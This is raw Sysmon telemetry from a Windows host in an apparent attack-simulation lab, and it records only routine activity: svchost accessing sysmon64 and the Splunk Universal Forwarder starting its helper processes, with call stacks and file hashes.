07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.940{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.940{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.941{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.440{0C1E0330-F47C-60EB-6C79-00000000D001}28401236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.268{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.268{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.268{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.268{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.253{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF8D9428C8DD8B17B7CD72D600DF18DC,SHA256=A9B47DF70FA909DBE11CA3363E67806D84162C53944C3D5B982E528C300EFCCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.784{0C1E0330-F47D-60EB-6E79-00000000D001}5843788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 